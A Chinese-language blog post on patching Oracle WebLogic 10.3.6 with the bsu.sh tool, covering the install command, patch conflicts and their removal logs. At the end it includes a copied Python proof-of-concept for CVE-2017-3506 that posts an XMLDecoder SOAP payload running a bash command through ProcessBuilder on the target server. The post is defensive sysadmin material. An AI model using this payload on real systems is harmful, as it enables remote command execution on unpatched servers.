weblogic打補丁方法
2018.01.09 15:12:35字數 732閱讀 7,417
weblogic雖然是大牌oracle的重量級中間件,但是也還是會時不時爆出一些漏洞的,這些漏洞如果不及時打補丁補救,很快會被一些黑客拿來去一些網站換積分或者當掛馬做肉雞。廢話不多說,因為weblogic打補丁的方式基本都是一個套路,這里記錄下weblogic的打補丁方法。
1、環境
{MW_HOME} = /usr/local/bea
{WL_HOME} = /usr/local/bea/wlserver_10.3
下面使用{MW_HOME}和{WL_HOME}代替真正的路徑
2、將補丁文件拷貝至{MW_HOME}/utils/bsu/cache_dir下並解壓,通常會得到一個jar包和一個patch-catalog_xxxxx.xml這樣的文件以及一個readme文檔(英文好的完全可以看readme文檔搞定、、、)
3、進入{MW_HOME}/utils/bsu/目錄修改bsu.sh中內存參數為MEM_ARGS="-Xms1500m -Xmx1500m",這里內存大小視不同的補丁會有區別,過小的話會報錯,不缺內存的話建議直接改大一點
4、執行安裝補丁命令
bsu.sh -install -patch_download_dir={MW_HOME}/utils/bsu/cache_dir -patchlist={PATCH_ID} -prod_dir={WL_HOME}
粘貼格式可能會有問題,報錯就手敲一遍、
5、這里是漫長的等待,漫長等待的結果有兩種,一種是安裝成功
Checking for conflicts............ No conflict(s) detected Installing Patch ID: FMJJ.. Result: Success 另一種是補丁沖突~~
Checking for conflicts........... Conflict(s) detected - resolve conflict condition and execute patch installation again Conflict condition details follow: Patch FMJJ is mutually exclusive and cannot coexist with patch(es): EJUW,ZLNA 這里提示看到該補丁和之前打的補丁EJUW和ZLNA相沖突,這時候就需要先卸載之前安裝的補丁才能繼續進行安裝、
執行命令
./bsu.sh -remove -verbose -patchlist=EJUW -prod_dir={WL_HOME} 這里又是漫長的等待,weblogic會檢測卸載是否有依賴,類似這種跟2個或以上補丁沖突的隨便找一個(建議先刪列表中的最后一個補丁、),然后漫長的等待之后系統會提示你想刪除這個補丁還要先刪除xxx補丁才行、、、
Checking for conflicts....... Conflict(s) detected - resolve conflict condition and execute patch removal again Conflict condition details follow: The selected patch cannot be removed until the following patch(es) are removed first: ZLNA 然后只能按weblogic說的滾去挨個刪完
Checking for conflicts...........
No conflict(s) detected
Starting removal of Patch ID: EJUW
Removing /usr/local/bea/modules/com.bea.core.weblogic.stax_1.11.0.0.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3jmsclient.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3client.jar
Removing /usr/local/bea/modules/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/wlserver_10.3/bugsfixed/WLS-PSU-bugsfixed.txt
Removing /usr/local/bea/wlserver_10.3/bugsfixed/20780171-WLS-10.3.6.0.12_PSU_WebServices-ClientSide-Configuration-README.txt
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/APP-INF/lib/commons-fileupload.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmxclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls-schema_10.3.6.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/wlst/modules/jython-modules.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/bin/wlsifconfig.sh from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlstestclient.ear from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlthint3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils.full_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-2.0.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/schema/weblogic-domain-binding.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient+ssl.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlw-langx.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmsclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsafclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.apache_1.3.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsaft3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.zip from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.common.security.saml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/glassfish.jstl_1.2.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wls-api.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jstl-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.descriptor.wl.binding_1.4.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls_7.2.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-notran-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-xa-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jdbcdrivers.xml from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/uddiexplorer.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding.plugins_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/webapp/WEB-INF/lib/console.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/BUG20780171_1036012.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxp_1.4.5.0.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
Updating /usr/local/bea/patch_wls1036/profiles/default/sys_manifest_classpath/weblogic_patch.jar
Old manifest value: Class-Path= ../../../patch_jars/BUG20780171_1036012.jar ../../../patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar ../../../patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar ../../../patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxp_1.4.5.0.jar ../../../patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
New manifest value: Class-Path=
Result: Success
然后繼續安裝,這時候就只會出現成功了
Checking for conflicts............ No conflict(s) detected Installing Patch ID: FMJJ.. Result: Success 6、查看weblogic的補丁列表中是否已出現剛才安裝的補丁
[bsu]# ./bsu.sh -prod_dir=/usr/local/bea/wlserver_10.3 -status=applied -verbose -view
ProductName: WebLogic Server
ProductVersion: 10.3 MP6
Components: WebLogic Server/Core Application Server,WebLogic Server/Admi
nistration Console,WebLogic Server/Configuration Wizard and
Upgrade Framework,WebLogic Server/Web 2.0 HTTP Pub-Sub Serve
r,WebLogic Server/WebLogic SCA,WebLogic Server/WebLogic JDBC
Drivers,WebLogic Server/Third Party JDBC Drivers,WebLogic S
erver/WebLogic Server Clients,WebLogic Server/WebLogic Web S
erver Plugins,WebLogic Server/UDDI and Xquery Support,WebLog
ic Server/Evaluation Database,WebLogic Server/Workshop Code
Completion Support
BEAHome: /usr/local/bea
ProductHome: /usr/local/bea/wlserver_10.3
PatchSystemDir: /usr/local/bea/utils/bsu
PatchDir: /usr/local/bea/patch_wls1036
Profile: Default
DownloadDir: /usr/local/bea/utils/bsu/cache_dir
JavaVersion: 1.6.0_29
JavaVendor: Sun
Patch ID: FMJJ
PatchContainer: FMJJ.jar
Checksum: 591477727
Severity: optional
Category: General
CR/BUG: 26519424
Restart: true
Description: WLS PATCH SET UPDATE 10.3.6.0.171017
WLS PATCH SET UPDATE 10
.3.6.0.171017
7、根據已有的POC腳本或者其他方式檢測漏洞是否還在
這里是本次漏洞CEV-2017-3506對應的Python檢測腳本,大神的博客扒來用下,勿怪勿怪~
#!/usr/bin/env python # coding:utf-8 # auther:dayu(大神的簽名) import requests import re from sys import argv heads = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Content-Type': 'text/xml;charset=UTF-8' } def poc(url): if not url.startswith("http"): url = "http://" + url if "/" in url: url += '/wls-wsat/CoordinatorPortType' post_str = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>ls</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' try: response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads) response = response.text response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0) except Exception, e: response = "" if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response: result = "Vulnerability exist" return result else: result = "No Vulnerability" return result if __name__ == '__main__': if len(argv) == 1: print "python 參數 url:port" exit(0) else: url = argv[1] result = poc(url=url) print result ps:本次記錄是借用安裝CEV-2017-3506補丁的機會,安裝的補丁ID:FMJJ,安裝沖突ID列表:ZLNA,EJUW。